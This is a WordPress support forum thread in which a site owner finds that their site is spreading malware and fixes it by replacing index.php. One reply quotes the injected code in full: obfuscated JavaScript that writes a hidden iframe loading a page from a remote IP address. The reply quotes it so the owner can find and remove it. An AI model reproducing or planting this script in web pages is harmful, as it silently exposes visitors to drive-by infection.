Forums

WordPress › Support » How-To and Troubleshooting

[resolved] Apparently, I have malware (8 posts)

  1. swollenthumb
    Member
    Posted 3 years ago #

    Ok, so I'm creating a new topic for a new problem which is continued from here:

    http://wordpress.org/support/topic/233100

    So I'm told my site is infected. Great. I am NOT equipped to handle this kind of thing. I get headaches by looking at long codes, which is why I started using wordpress in the first place, so that I could eventually forget the code, and just plug in my articles.

    So, like I said, I'm having trouble tackling this issue. Since this isn't an uncommon problem, I'd like to know how this kind of thing should be dealt with. Thanks!

  2. mike868y
    Member
    Posted 3 years ago #

    First of all, your site isn't infected, it is trying to infect others. Second off all, the malicious code is as follows :`<script type="text/javascript">
    <!--
    var s=" =jgsbnf!tsd>(iuuq;0078/326/342/3530vt0joefy/qiq(!xjeui>(2(!ifjhiu>(2(!tuzmf>(wjtjcjmjuz;!ijeefo<(?=0jgsbnf?";
    m=""; for (i=0; i<s.length; i++) m+=String.fromCharCode(s.charCodeAt(i)-1); document.write(m);
    //-->
    </script>`What you need to do is find that code in your wordpress theme files (most likely in footer.php but possible index.php) and delete it, that should solve your problem.

  3. Len
    Member
    Posted 3 years ago #

    Additionally please read through the threads in the link I previously gave you. Obviously someone penetrated your defences and inserted that code. Check your logs to see if you can find a point of entry. Check ALL OF YOUR FILES for evidence of tampering. And follow the suggestions in that thread.

  4. swollenthumb
    Member
    Posted 3 years ago #

    Ok, I found the script in question. It is located in index.php, which is in the main wordpress directory. The same folder that has the wordpress readme, and the folders wp_admin, wp_content, and wp_includes. When I tried deleting the script, my site went completely blank. So I'm completely stumped now. Suggestions???

  5. swollenthumb
    Member
    Posted 3 years ago #

    I would also like to reiterate that this wasn't in the theme folder, it was in the directory that I installed wordpress into.

  6. swollenthumb
    Member
    Posted 3 years ago #

    Ok, so what I did was re-download WordPress 2.7, and uploaded a brand new index.php to my root directory. (keeping a copy of the old one just in case) and this SEEMS to have fixed my malware problem.

    Can anyone confirm that the problem is fixed?

  7. UseShots
    Member
    Posted 3 years ago #

    Looks like it's clean right now.

    Make sure to read http://codex.wordpress.org/Hardening_WordPress

  8. blogreco
    Member
    Posted 3 years ago #

    I'm infected with Malware too - I can't find the code noted above.

    Any help is appreciated.

    Thanks,
    Bruno
    bruno@brunologreco.com

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.